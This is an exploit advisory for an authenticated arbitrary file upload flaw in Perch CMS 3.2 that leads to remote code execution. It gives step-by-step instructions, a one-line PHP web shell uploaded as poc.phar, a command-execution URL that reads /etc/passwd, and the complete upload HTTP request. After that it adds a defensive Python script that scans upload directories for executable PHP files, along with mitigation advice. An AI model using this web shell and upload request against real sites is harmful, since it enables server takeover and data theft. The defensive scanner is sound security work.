Perch 3.2 Remote Code Execution
Perch version 3.2 suffers from a remote code execution vulnerability.
Exploit Title: Perch v3.2 - Remote Code Execution (RCE)
Application: Perch Cms
Version: v3.2
Bugs: RCE
Technology: PHP
Vendor URL: https://grabaperch.com/
Software Link: https://grabaperch.com/download
Date of found: 21.07.2023
Author: Mirabbas Ağalarov
Tested on: Linux

2. Technical Details & POC
========================================
steps:
1. login to account as admin
2. go to visit assets (http://localhost/perch_v3.2/perch/core/apps/assets/)
3. add assets (http://localhost/perch_v3.2/perch/core/apps/assets/edit/)
4. upload poc.phar file

poc.phar file contents :
<?php $a=$_GET['code']; echo system($a);?>

5. visit http://localhost/perch_v3.2/perch/resources/admin/poc.phar?code=cat%20/etc/passwd

poc request:

POST /perch_v3.2/perch/core/apps/assets/edit/ HTTP/1.1
Host: localhost
Content-Length: 1071
Cache-Control: max-age=0
sec-ch-ua:
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: ""
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryYGoerZn09hHSjd4Z
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/perch_v3.2/perch/core/apps/assets/edit/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: phpwcmsBELang=en; cmsa=1; PHPSESSID=689rdj63voor49dcfm9rdpolc9
Connection: close

------WebKitFormBoundaryYGoerZn09hHSjd4Z
Content-Disposition: form-data; name="resourceTitle"

test
------WebKitFormBoundaryYGoerZn09hHSjd4Z
Content-Disposition: form-data; name="image"; filename="poc.phar"
Content-Type: application/octet-stream

<?php $a=$_GET['code']; echo system($a);?>
------WebKitFormBoundaryYGoerZn09hHSjd4Z
Content-Disposition: form-data; name="image_field"

1
------WebKitFormBoundaryYGoerZn09hHSjd4Z
Content-Disposition: form-data; name="image_assetID"


------WebKitFormBoundaryYGoerZn09hHSjd4Z
Content-Disposition: form-data; name="resourceBucket"

admin
------WebKitFormBoundaryYGoerZn09hHSjd4Z
Content-Disposition: form-data; name="tags"

test
------WebKitFormBoundaryYGoerZn09hHSjd4Z
Content-Disposition: form-data; name="btnsubmit"

Submit
------WebKitFormBoundaryYGoerZn09hHSjd4Z
Content-Disposition: form-data; name="formaction"

edit
------WebKitFormBoundaryYGoerZn09hHSjd4Z
Content-Disposition: form-data; name="token"

5494af3e8dbe5ac399ca7f12219cfe82
------WebKitFormBoundaryYGoerZn09hHSjd4Z--
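
A defender-side check for the condition described above, as an added example that is not part of the original advisory or of Perch's code: it audits an asset bucket directory such as perch/resources/admin for files that a PHP handler may execute, by extension (any position, case-insensitive) or by content. The function names, the extension list and the sample files are assumptions constructed for illustration; which extensions actually execute depends on the web server configuration.

```python
import tempfile
from pathlib import Path

# Extensions commonly mapped to the PHP handler (assumption: server-config dependent).
PHP_EXTS = {"php", "php3", "php4", "php5", "php7", "phtml", "pht", "phar", "phps"}
PHP_TAGS = (b"<?php", b"<?=")


def classify(name, head):
    """Return the reasons a file found in an upload bucket is suspicious."""
    reasons = []
    # Check every extension, not only the last one (catches name.php.jpg).
    ext = next((p for p in name.lower().split(".")[1:] if p in PHP_EXTS), None)
    if ext:
        reasons.append("executable extension: ." + ext)
    if any(tag in head.lower() for tag in PHP_TAGS):
        reasons.append("PHP open tag in content")
    return reasons


def audit_bucket(root, read_bytes=4096):
    """Walk an upload directory and return {relative_path: [reasons]}."""
    findings = {}
    for path in sorted(Path(root).rglob("*")):
        if path.is_file():
            with path.open("rb") as fh:
                head = fh.read(read_bytes)
            reasons = classify(path.name, head)
            if reasons:
                findings[path.relative_to(root).as_posix()] = reasons
    return findings


def demo():
    """Constructed sample bucket: a real image, a .phar upload, two disguised files."""
    with tempfile.TemporaryDirectory() as root:
        samples = {
            "logo.png": b"\x89PNG\r\n\x1a\n" + b"\x00" * 16,
            "poc.phar": b"<?php /* constructed placeholder */ ?>",
            "banner.PHP.jpg": b"\xff\xd8\xff\xe0 not really an image",
            "notes.txt": b"<?= 'template tag in a text file' ?>",
        }
        for name, data in samples.items():
            Path(root, name).write_bytes(data)
        return audit_bucket(root)


if __name__ == "__main__":
    for rel_path, why in demo().items():
        print(rel_path, "->", "; ".join(why))
```

Any finding in a bucket that is served directly by the web server is worth investigating; the durable mitigation is an extension allow-list at upload time plus disabling script execution for the resources directory.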